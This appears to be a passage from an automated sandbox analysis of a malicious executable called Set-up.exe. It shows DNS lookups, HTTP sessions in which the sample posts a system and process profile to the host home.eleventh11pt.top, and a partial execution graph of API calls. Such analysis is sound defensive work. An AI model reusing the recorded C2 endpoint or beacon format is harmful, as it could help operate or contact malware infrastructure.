                        Dec 29, 2024 16:51:02.888005018 CET53590121.1.1.1192.168.2.4
                        Dec 29, 2024 16:51:09.574831009 CET5901453192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:09.574958086 CET5901453192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:09.723341942 CET53590141.1.1.1192.168.2.4
                        Dec 29, 2024 16:51:09.723607063 CET53590141.1.1.1192.168.2.4
                        Dec 29, 2024 16:51:11.505837917 CET5901653192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:11.505880117 CET5901653192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:11.646056890 CET53590161.1.1.1192.168.2.4
                        Dec 29, 2024 16:51:11.646226883 CET53590161.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 29, 2024 16:50:58.657742023 CET192.168.2.41.1.1.10xa744Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                        Dec 29, 2024 16:50:58.657793045 CET192.168.2.41.1.1.10x2537Standard query (0)httpbin.org28IN (0x0001)false
                        Dec 29, 2024 16:51:02.032633066 CET192.168.2.41.1.1.10xfe37Standard query (0)home.eleventh11pt.topA (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:02.032788038 CET192.168.2.41.1.1.10xf08dStandard query (0)home.eleventh11pt.top28IN (0x0001)false
                        Dec 29, 2024 16:51:09.574831009 CET192.168.2.41.1.1.10xa0cbStandard query (0)home.eleventh11pt.topA (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:09.574958086 CET192.168.2.41.1.1.10xad70Standard query (0)home.eleventh11pt.top28IN (0x0001)false
                        Dec 29, 2024 16:51:11.505837917 CET192.168.2.41.1.1.10xa976Standard query (0)home.eleventh11pt.topA (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:11.505880117 CET192.168.2.41.1.1.10x888eStandard query (0)home.eleventh11pt.top28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 29, 2024 16:50:58.949301004 CET1.1.1.1192.168.2.40xa744No error (0)httpbin.org52.73.63.247A (IP address)IN (0x0001)false
                        Dec 29, 2024 16:50:58.949301004 CET1.1.1.1192.168.2.40xa744No error (0)httpbin.org54.173.142.217A (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:02.888005018 CET1.1.1.1192.168.2.40xfe37No error (0)home.eleventh11pt.top193.233.84.212A (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:09.723341942 CET1.1.1.1192.168.2.40xa0cbNo error (0)home.eleventh11pt.top193.233.84.212A (IP address)IN (0x0001)false
                        Dec 29, 2024 16:51:11.646226883 CET1.1.1.1192.168.2.40xa976No error (0)home.eleventh11pt.top193.233.84.212A (IP address)IN (0x0001)false
                        • httpbin.org
                        • home.eleventh11pt.top
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449731193.233.84.212806880C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 29, 2024 16:51:03.011533022 CET12360OUTPOST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1
                        Host: home.eleventh11pt.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 499220
                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317316068", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                        Dec 29, 2024 16:51:03.132874012 CET1236OUTData Raw: 4c 6f 4b 43 5a 4c 57 52 69 36 37 57 61 4e 70 6f 64 6b 7a 30 72 58 5c 2f 41 49 4a 5a 4c 63 34 7a 38 64 5c 2f 4c 4a 37 66 38 4b 77 33 66 2b 39 44 58 50 4f 50 65 76 34 50 78 48 37 54 50 36 45 57 45 72 31 4d 4e 69 66 47 71 64 43 76 54 64 70 30 36 6e
                        Data Ascii: LoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1r
                        Dec 29, 2024 16:51:03.132889032 CET3708OUTData Raw: 32 49 71 55 5a 59 6e 43 53 79 5c 2f 47 5a 66 6d 47 4d 5c 2f 6a 33 36 58 48 30 43 73 5c 2f 77 44 6f 34 5a 48 6c 50 69 66 34 66 63 5a 34 33 78 74 38 42 73 32 78 65 46 79 48 47 65 49 6b 75 43 6c 77 4a 78 46 77 4e 78 70 69 4b 56 57 72 53 34 52 38 54
                        Data Ascii: 2IqUZYnCSy\/GZfmGM\/j36XH0Cs\/wDo4ZHlPif4fcZ43xt8Bs2xeFyHGeIkuClwJxFwNxpiKVWrS4R8TuBcLxZx7h+EcVnFGhiMbwdnWE4wz\/hvjDBYfHUctzeGfZNxBkOUaFFWKg2P7fl\/9lX9VH8BCUUUUAFQv\/rI6+hf2V\/h54a+LX7RXwe+GfjGG7m8L+OfG+k+GtbSwu3sb4WOqu9tJLZXaBjBd25dZ7Z3jmh86N
                        Dec 29, 2024 16:51:03.132901907 CET4944OUTData Raw: 77 44 58 77 44 31 70 5c 2f 77 44 73 54 66 4a 35 6e 2b 74 5c 2f 64 66 76 78 31 5c 2f 7a 6e 5c 2f 77 43 76 6b 41 70 74 75 6b 6c 64 5c 2f 77 44 70 72 35 70 39 65 76 38 41 6e 2b 66 72 54 50 6e 2b 54 66 38 41 4a 36 65 5a 46 64 66 35 34 37 66 72 55 30
                        Data Ascii: wDXwD1p\/wDsTfJ5n+t\/dfvx1\/zn\/wCvkAptukld\/wDpr5p9ev8An+frTPn+Tf8AJ6eZFdf547frU0cXmeSjp+56+ZJEfP8A8\/h7euXyfx\/35JfK3yf8tu3+QKC4b\/L9UQs23f8APv8ANit\/N8vIz\/pX4\/XtTJP3f8e8\/wCt\/d\/uPen7SrIn7v8Ady\/9\/v8ARf8AP1NQ7nkX5P3XAi8sfv8A\/wDgv89aDUY
                        Dec 29, 2024 16:51:03.133064985 CET4944OUTData Raw: 39 4f 5c 2f 46 56 4d 77 38 54 66 44 5c 2f 4d 36 38 61 61 78 57 5a 2b 44 50 43 57 59 59 79 64 4f 6e 47 6e 47 72 69 73 54 6e 6e 46 73 71 6c 54 6c 6a 35 63 73 49 33 62 63 61 63 49 51 54 35 59 52 53 6a 6f 71 54 79 5c 2f 66 39 50 38 41 36 39 52 31 5c
                        Data Ascii: 9O\/FVMw8TfD\/M68aaxWZ+DPCWYYydOnGnGrisTnnFsqlTlj5csI3bcacIQT5YRSjoqTy\/f9P8A69R1\/Wh\/FHtPL8f+AR+X7\/p\/9eo6sUUGhXqOTt+NXKr0AV6KsU2Tn5+mP6f1Heg6CGiiigCLYfb\/AD+FMqxVetPZ+f4f8E6AqOTt+P8ASpKay7qPZ+f4f8ECGm7F9P5\/406ij2fn+H\/BNKfX5fqM2D3\/AM\/hV
                        Dec 29, 2024 16:51:03.133137941 CET4944OUTData Raw: 50 68 71 4d 4d 58 57 63 4b 46 47 6e 43 4e 6b 6f 78 58 79 72 2b 30 56 71 48 6b 2b 46 39 47 30 35 53 51 31 5c 2f 72 51 6e 59 63 66 4e 44 59 32 64 77 48 55 35 35 78 35 31 33 62 76 77 4d 35 51 63 67 5a 42 2b 4f 74 75 33 6a 47 4f 5c 2f 72 58 30 58 2b
                        Data Ascii: PhqMMXWcKFGnCNkoxXyr+0VqHk+F9G05SQ1\/rQnYcfNDY2dwHU55x513bvwM5QcgZB+Otu3jGO\/rX0X+0Zq1nc+IdB0a2v7K8fTNOu7mcWd1FdLDLqF0kJjkaFnEcwXTkZopNkqq0bMoV0J+dK\/wBL\/o84KjhfCfhzEUpQn\/as8yzSc6bUozWIzHE0qElJN818JQwzvutuh\/jr9KvMa+N8cOLsLWjUp\/2LDJ8mhTqKUZ
                        Dec 29, 2024 16:51:03.133199930 CET2472OUTData Raw: 6b 5c 2f 76 62 34 5c 2f 33 6b 6f 38 32 54 5c 2f 4f 4b 64 6e 47 39 66 2b 65 58 5c 2f 77 42 61 6d 59 5c 2f 64 75 2b 37 65 5c 2f 6d 5c 2f 70 5c 2f 4c 5c 2f 48 36 31 71 61 38 36 38 5c 2f 36 2b 59 77 38 72 76 53 61 4e 50 2b 57 50 6c 5c 2f 34 66 31 5c
                        Data Ascii: k\/vb4\/3ko82T\/OKdnG9f+eX\/wBamY\/du+7e\/m\/p\/L\/H61qa868\/6+Yw8rvSaNP+WPl\/4f1\/pTG3+Z\/feP8A55\/5\/HvU2Mb8P\/27+Vnyf5e\/+TTJPLXZ\/rPM7xx8dP8AP\/16Cyt3KFN6Y\/1n+f8APfoTULR\/P5Ozznk\/7b+\/H+frVxtmz78aJ\/qpJP8A21x16ev0qH5xG6b43eTuIrX0\/wAf8+n
                        Dec 29, 2024 16:51:03.253561974 CET2472OUTData Raw: 38 58 65 4a 5c 2f 44 4d 69 79 36 44 72 6d 70 61 59 55 6b 45 6f 69 74 72 6c 78 62 4e 49 43 43 48 6b 74 48 4c 32 73 72 67 67 45 4e 4a 43 78 42 35 47 44 58 6e 59 38 53 65 48 69 47 59 61 39 6f 70 43 46 67 35 47 71 57 4f 45 4b 38 73 47 50 6e 34 55 71
                        Data Ascii: 8XeJ\/DMiy6DrmpaYUkEoitrlxbNICCHktHL2srggENJCxB5GDXnY8SeHiGYa9opCFg5GqWOEK8sGPn4UqOWBxjvT4vEGhTq7wa1pEyR\/6x4tSs5FTjPzskxC8An5iOOele\/mGGyTOcJVy7NcPlea4HERtWwOYUsJjsJXj1VXDYmNWjVjZ7ThJa+Z4mV4ziLIMbRzXJMVnWS5jhZKWHzLK62Oy7G4ebas6OMwkqNejJvls4VI
                        Dec 29, 2024 16:51:03.253746986 CET2472OUTData Raw: 38 52 44 43 31 2b 42 73 39 56 65 57 57 5a 68 6d 38 36 64 4b 68 54 78 44 77 32 43 79 6e 44 30 73 56 6d 6e 31 35 34 65 72 56 6a 6c 2b 4d 79 37 44 31 38 4e 57 78 75 57 59 35 34 66 4d 73 4e 44 46 59 4e 31 73 4a 44 36 33 68 76 61 76 6f 72 48 62 57 6f
                        Data Ascii: 8RDC1+Bs9VeWWZhm86dKhTxDw2CynD0sVmn154erVjl+My7D18NWxuWY54fMsNDFYN1sJD63hvavorHbWoYfFQ8Hy3el3eqt8PPhb8TFbR9Qub+3j8O\/F74feFviX4ViuGutO02SLU4vDni\/SV1WCKK4s7fUPtENlf6hapDez7FfWZRnGWZ9gKOaZPjaOYZfiHUVHFYduVKo6VSVGqk2ou8KsJwkmk1KLTPhc9yDOeGcxqZRn
                        Dec 29, 2024 16:51:03.253856897 CET7416OUTData Raw: 2f 71 74 44 48 34 69 6a 69 4d 62 6a 38 76 70 5a 72 67 38 4a 39 61 70 59 53 65 46 70 59 6e 45 5a 5a 58 70 34 2b 6e 52 72 56 71 64 52 34 53 54 72 75 4b 70 77 6e 4b 50 2b 62 57 49 38 46 66 46 48 4c 38 48 6d 75 4f 7a 44 68 48 48 59 48 44 35 4e 68 4d
                        Data Ascii: /qtDH4ijiMbj8vpZrg8J9apYSeFpYnEZZXp4+nRrVqdR4STruKpwnKP+bWI8FfFHL8HmuOzDhHHYHD5NhMdj8xWMxWW4XEYfA5ZjsVluPxkcFXx0MZiMNhswweJwdSvhqFan9YoypRk5OKfN1E\/X8P6mpabewtZ6l8NrW41bwrDo3xN+Hfj\/4paf40n1jUYvB\/hXwl8I5PFH\/C4J\/Hmof2C2o6Hf8AwssvCWoap4u07T9I
                        Dec 29, 2024 16:51:03.253905058 CET4944OUTData Raw: 76 5a 65 48 62 71 7a 73 76 46 31 68 2b 7a 6d 74 78 34 6e 30 33 34 6b 61 52 34 67 54 54 76 44 65 75 32 63 41 74 50 46 32 6c 66 45 4f 44 54 72 5a 50 76 71 34 30 50 52 4c 75 52 5a 72 72 52 39 4b 75 5a 6c 78 74 6c 75 4e 50 74 4a 70 46 78 6a 47 31 35
                        Data Ascii: vZeHbqzsvF1h+zmtx4n034kaR4gTTvDeu2cAtPF2lfEODTrZPvq40PRLuRZrrR9KuZlxtluNPtJpFxjG15IWYYwMYPGB6VEfDnh4uJDoOimRRhXOl2JcDngN5GQOTwD3Pqa4uKfoa5VxLxNnfEkeN87y2rnucY3NcVQwlKjG317hvE8LToKsuWrOGHy\/GYjEYFVpVoYLMpTxWGhSp4rMMPjO7gr9oHnnCHBPDHBb8OuHs3w3C+
                        Dec 29, 2024 16:51:09.486716986 CET157INHTTP/1.1 200 OK
                        Server: nginx/1.22.1
                        Date: Sun, 29 Dec 2024 15:51:09 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 1
                        Connection: close
                        Data Raw: 30
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449732193.233.84.212806880C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 29, 2024 16:51:09.906896114 CET101OUTGET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1
                        Host: home.eleventh11pt.top
                        Accept: */*
                        Dec 29, 2024 16:51:11.498604059 CET372INHTTP/1.1 404 NOT FOUND
                        Server: nginx/1.22.1
                        Date: Sun, 29 Dec 2024 15:51:11 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 207
                        Connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449733193.233.84.212806880C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        Dec 29, 2024 16:51:11.771110058 CET174OUTPOST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1
                        Host: home.eleventh11pt.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 31
                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                        Data Ascii: { "id1": "0", "data": "Done1" }
                        Dec 29, 2024 16:51:13.545677900 CET372INHTTP/1.1 404 NOT FOUND
                        Server: nginx/1.22.1
                        Date: Sun, 29 Dec 2024 15:51:13 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 207
                        Connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973052.73.63.2474436880C:\Users\user\Desktop\Set-up.exe
                        TimestampBytes transferredDirectionData
                        2024-12-29 15:51:01 UTC52OUTGET /ip HTTP/1.1
                        Host: httpbin.org
                        Accept: */*
                        2024-12-29 15:51:01 UTC224INHTTP/1.1 200 OK
                        Date: Sun, 29 Dec 2024 15:51:01 GMT
                        Content-Type: application/json
                        Content-Length: 31
                        Connection: close
                        Server: gunicorn/19.9.0
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Credentials: true
                        2024-12-29 15:51:01 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                        Data Ascii: { "origin": "8.46.123.189"}


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Target ID:0
                        Start time:10:50:57
                        Start date:29/12/2024
                        Path:C:\Users\user\Desktop\Set-up.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Set-up.exe"
                        Imagebase:0x20000
                        File size:7'363'720 bytes
                        MD5 hash:FB412D366ACB254B7870E17EA228E971
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:1.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:32.8%
                          Total number of Nodes:1187
                          Total number of Limit Nodes:69
                          execution_graph 104185 5b400 104186 5b425 104185->104186 104187 5b40b 104185->104187 104190 27770 104187->104190 104191 27790 104190->104191 104192 277b6 recv 104190->104192 104191->104192 104193 27799 104191->104193 104194 277c4 104192->104194 104195 2782e 104192->104195 104196 277a3 recv 104193->104196 104197 277db 104193->104197 104204 272a0 48 API calls 104194->104204 104196->104194 104205 272a0 48 API calls 104197->104205 104199 277d4 104199->104195 104201 277ec __acrt_iob_func 104206 2cb20 76 API calls 104201->104206 104203 2780c fflush _errno 104203->104195 104204->104199 104205->104201 104206->104203 104207 5e400 104208 5e412 104207->104208 104212 5e459 104207->104212 104209 5e422 104208->104209 104238 73030 48 API calls 104208->104238 104239 809d0 48 API calls 104209->104239 104214 5e4a8 104212->104214 104217 5e495 104212->104217 104219 5b5a0 104212->104219 104213 5e42b 104240 568b0 56 API calls 104213->104240 104217->104214 104218 5b5a0 52 API calls 104217->104218 104218->104214 104220 5b5c0 104219->104220 104236 5b5d2 104219->104236 104220->104236 104241 3d8c0 104220->104241 104222 5b5f2 104223 5b611 104222->104223 104224 5b638 104222->104224 104245 5ec70 QueryPerformanceCounter GetTickCount 104223->104245 104246 5ec10 QueryPerformanceCounter GetTickCount 104224->104246 104227 5b61b 104228 5b713 104227->104228 104230 5b626 104227->104230 104248 64f40 50 API calls 104228->104248 104231 5b65a 104230->104231 104232 5b72b 104230->104232 104235 5b737 104230->104235 104230->104236 104247 650a0 49 API calls 104230->104247 104231->104232 104231->104235 104231->104236 104232->104236 104249 650a0 49 API calls 104232->104249 104235->104236 104250 650a0 49 API calls 104235->104250 104236->104217 104238->104209 104239->104213 104240->104212 104242 3d968 GetTickCount 104241->104242 104243 3d8dd QueryPerformanceCounter 104241->104243 104244 3d913 104242->104244 104243->104244 104244->104222 104245->104227 104246->104230 104247->104230 104248->104236 104249->104236 104250->104236 104251 5b3c0 104252 5b3ee 104251->104252 104253 5b3cb 104251->104253 104257 59290 104253->104257 104274 276a0 104253->104274 104254 5b3ea 104258 276a0 82 API calls 104257->104258 104259 592e5 104258->104259 104260 593c3 WSAGetLastError 104259->104260 104261 592f3 104259->104261 104262 593e5 104260->104262 104271 59392 104260->104271 104265 3d8c0 2 API calls 104261->104265 104261->104271 104288 3d090 64 API calls 104262->104288 104263 593be 104263->104254 104266 5930b 104265->104266 104270 59335 WSAIoctl 104266->104270 104266->104271 104267 593f7 104289 64f40 50 API calls 104267->104289 104270->104271 104272 59366 104270->104272 104271->104263 104290 650a0 49 API calls 104271->104290 104272->104271 104273 59371 setsockopt 104272->104273 104273->104271 104275 276c0 104274->104275 104276 276e6 send 104274->104276 104275->104276 104277 276c9 104275->104277 104278 276f4 104276->104278 104279 2775e 104276->104279 104281 276d3 send 104277->104281 104282 2770b 104277->104282 104291 272a0 48 API calls 104278->104291 104279->104254 104281->104278 104292 272a0 48 API calls 104282->104292 104283 27704 104283->104279 104285 2771c __acrt_iob_func 104293 2cb20 76 API calls 104285->104293 104287 2773c fflush _errno 104287->104279 104288->104267 104289->104271 104290->104263 104291->104283 104292->104285 104293->104287 104294 60700 104295 6099d 104294->104295 104296 60719 104294->104296 104296->104295 104298 609b5 104296->104298 104302 609f6 104296->104302 104303 60a35 104296->104303 104311 27310 104296->104311 104323 5b8e0 80 API calls 104296->104323 104324 8f570 80 API calls 104296->104324 104325 4eb30 80 API calls 104296->104325 104326 813a0 80 API calls 104296->104326 104327 4eae0 80 API calls 104296->104327 104298->104295 104328 650a0 49 API calls 104298->104328 104329 275a0 104302->104329 104335 64f40 50 API calls 104303->104335 104309 275a0 48 API calls 104309->104295 104312 27320 104311->104312 104313 27332 104311->104313 104312->104313 104314 27390 104312->104314 104317 27383 104313->104317 104318 27366 104313->104318 104337 272a0 48 API calls 104314->104337 104316 273a1 __acrt_iob_func 104338 2cb20 76 API calls 104316->104338 104317->104296 104336 272a0 48 API calls 104318->104336 104321 273c1 fflush _errno 104321->104317 104322 27380 104322->104317 104323->104296 104324->104296 104325->104296 104326->104296 104327->104296 104328->104295 104330 275d4 104329->104330 104331 275aa 104329->104331 104330->104309 104331->104330 104332 275c1 104331->104332 104339 272a0 48 API calls 104332->104339 104334 275d1 104334->104330 104335->104295 104336->104322 104337->104316 104338->104321 104339->104334 104340 5f6c3 104344 5f6e3 104340->104344 104350 5f7b9 104340->104350 104341 5f72e 104342 5f7f4 104341->104342 104343 5f743 104341->104343 104345 5ff1a 104342->104345 104354 5f764 104342->104354 104347 5f754 WSASetLastError 104343->104347 104343->104354 104344->104341 104363 650a0 49 API calls 104344->104363 104368 60c80 48 API calls 104345->104368 104347->104354 104348 5ff5b 104359 5ff79 104348->104359 104369 354e0 QueryPerformanceCounter GetTickCount 104348->104369 104350->104344 104350->104354 104367 64fd0 49 API calls 104350->104367 104352 60034 104356 5f9bc 104354->104356 104358 5f8d4 104354->104358 104365 60d30 52 API calls 104354->104365 104357 5f90c 104356->104357 104366 650a0 49 API calls 104356->104366 104358->104357 104364 650a0 49 API calls 104358->104364 104359->104352 104370 650a0 49 API calls 104359->104370 104363->104341 104364->104357 104365->104354 104366->104357 104367->104344 104368->104348 104369->104359 104370->104352 104371 213c9 104372 213d0 104371->104372 104373 213e3 104372->104373 104374 211da 104372->104374 104416 3a8a20 129 API calls 104373->104416 104376 21460 _initterm 104374->104376 104377 211e7 104374->104377 104379 21483 104376->104379 104378 213fd _initterm 104377->104378 104383 211ff 104377->104383 104378->104383 104381 2148a exit 104379->104381 104382 21231 SetUnhandledExceptionFilter _set_invalid_parameter_handler 104410 3a9210 104382->104410 104396 3a93e0 104383->104396 104385 21257 __p__acmdln 104386 2126e malloc 104385->104386 104386->104379 104388 21300 104386->104388 104389 21318 strlen malloc memcpy 104388->104389 104389->104389 104390 2134e 104389->104390 104411 3a9060 104390->104411 104392 21367 104392->104381 104393 213a1 104392->104393 104394 21448 _cexit 104393->104394 104395 213af 104393->104395 104398 3a9400 104396->104398 104409 3a93f3 104396->104409 104397 3a9688 104399 3a9699 104397->104399 104397->104409 104398->104397 104401 3a96c7 104398->104401 104406 3a94e2 104398->104406 104408 3a95b8 104398->104408 104398->104409 104399->104401 104417 3a9280 13 API calls 104399->104417 104418 3a9220 13 API calls 104401->104418 104403 3a96df 104403->104382 104404 3a9280 13 API calls 104404->104406 104405 3a9220 13 API calls 104405->104406 104406->104398 104406->104404 104406->104405 104407 3a95ea VirtualProtect 104407->104408 104408->104407 104408->104409 104409->104382 104410->104385 104412 3a9069 104411->104412 104413 3a9000 104411->104413 104412->104392 104419 214c0 _crt_atexit 104413->104419 104415 3a9030 104415->104392 104416->104377 104417->104399 104418->104403 104419->104415 104420 ea080 104423 e9740 104420->104423 104422 ea09b 104424 e975d 104423->104424 104425 e9780 104423->104425 104426 e78a0 2 API calls 104424->104426 104427 e9788 getenv 104425->104427 104428 e9914 memset RegOpenKeyExA 104425->104428 104435 e9763 104426->104435 104430 e78a0 2 API calls 104427->104430 104429 e995a RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen 104428->104429 104455 e9812 104428->104455 104473 e78a0 104429->104473 104432 e979b 104430->104432 104433 e97a6 _stat64 104432->104433 104432->104455 104434 e97c7 104433->104434 104439 e980b 104433->104439 104436 e97f6 _stricmp 104434->104436 104437 e97e2 _time64 104434->104437 104435->104427 104435->104433 104435->104455 104436->104439 104437->104436 104439->104455 104462 e77b0 104439->104462 104443 e98a1 _time64 104444 e78a0 2 API calls 104443->104444 104445 e98bb 104444->104445 104445->104455 104482 de2d0 memset _time64 104445->104482 104447 e98d3 104447->104455 104483 de2d0 memset _time64 104447->104483 104449 e6d60 memcmp 104456 e98e8 104449->104456 104450 dd120 17 API calls 104450->104456 104452 d4fe0 memset 104452->104456 104453 de730 memset 104453->104456 104455->104422 104456->104449 104456->104450 104456->104452 104456->104453 104456->104455 104457 e6320 memcpy 104456->104457 104458 de3c0 memset strlen memcpy 104456->104458 104459 e78a0 strlen memcpy 104456->104459 104460 e9c3d _stricmp 104456->104460 104484 dd190 104456->104484 104533 de760 memset 104456->104533 104534 de7c0 104456->104534 104457->104456 104458->104456 104459->104456 104460->104456 104463 e7827 104462->104463 104464 e77d7 fopen 104462->104464 104463->104455 104478 d4fe0 104463->104478 104465 e780e GetLastError 104464->104465 104466 e77e9 fseek 104464->104466 104465->104463 104467 e782f ftell 104466->104467 104468 e7801 fclose 104466->104468 104467->104468 104469 e783c fseek 104467->104469 104468->104463 104469->104468 104470 e784f 104469->104470 104471 e7866 fread 104470->104471 104472 e787a 104470->104472 104471->104468 104471->104472 104472->104468 104474 e78ae strlen 104473->104474 104475 e78e1 104473->104475 104474->104475 104476 e78bc 104474->104476 104475->104432 104476->104475 104477 e78d6 memcpy 104476->104477 104477->104475 104479 d4fec 104478->104479 104480 d5003 104479->104480 104481 d4ff3 memset 104479->104481 104480->104443 104480->104455 104481->104480 104482->104447 104483->104456 104485 dd1ae 104484->104485 104492 dd1fa 104484->104492 104486 dd253 SetLastError 104485->104486 104538 